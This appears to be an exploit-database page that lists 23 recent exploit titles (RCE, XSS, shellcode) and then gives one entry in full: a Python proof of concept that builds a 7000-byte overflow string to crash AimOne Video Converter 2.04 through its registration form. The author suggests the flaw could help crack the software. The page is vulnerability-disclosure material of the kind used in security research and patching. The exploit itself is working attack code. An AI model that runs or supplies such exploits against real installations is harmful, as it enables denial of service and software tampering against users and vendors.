
23 changes to exploits/shellcodes/ghdb ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS) Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated) TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated) GeoVision Camera GV-ADR2701 - Authentication Bypass AD Manager Plus 7122 - Remote Code Execution (RCE) Enlightenment v0.25.3 - Privilege escalation Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE) Apache 2.4.x - Buffer Overflow perfSONAR v4.4.5 - Partial Blind CSRF SugarCRM 12.2.0 - Remote Code Execution (RCE) XCMS v1.83 - Remote Command Execution (RCE) Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS) GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS) NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit Splashtop 8.71.12001.0 - Unquoted Service Path Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS) FlipRotation v1.0 decoder - Shellcode (146 bytes) Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes) macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode
60 lines
No EOL
1.7 KiB
Text
60 lines
No EOL
1.7 KiB
Text
## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
|
|
## Author: nu11secur1ty
|
|
## Date: 01.05.2023
|
|
## Vendor: https://aimone-video-converter.software.informer.com/,
|
|
http://www.aimonesoft.com/
|
|
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
|
|
## Reference:
|
|
|
|
## Description:
|
|
The AimOne Video Converter V2.04 Build 103 suffers from buffer
|
|
overflow and local Denial of Service.
|
|
The registration form is not working properly and crashes the video converter.
|
|
When the attacker decides to register the product. This can allow him
|
|
to easily crack the software and do more bad things it depending on
|
|
the case.
|
|
|
|
## STATUS: HIGH Vulnerability - CRITICAL
|
|
|
|
[+] Exploit:
|
|
|
|
```Python
|
|
#!/usr/bin/python
|
|
# nu11secur1ty
|
|
|
|
print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer
|
|
Overflow exploit builder...\n")
|
|
input("Press any key to build the exploit...\n")
|
|
buffer = "\x41" * 7000
|
|
|
|
try:
|
|
f=open("PoC.txt","w")
|
|
print("[+] Creating %s bytes exploit payload.." %len(buffer))
|
|
f.write(buffer)
|
|
f.close()
|
|
print("[+] The PoC file was created!")
|
|
except:
|
|
print("File cannot be created")
|
|
```
|
|
|
|
## Reproduce:
|
|
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)
|
|
|
|
## Proof and Exploit:
|
|
[href](https://streamable.com/v1hvbf)
|
|
|
|
## Time spent
|
|
`00:35:00`
|
|
|
|
## Writing an exploit
|
|
`00:15:00`
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html and https://www.exploit-db.com/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |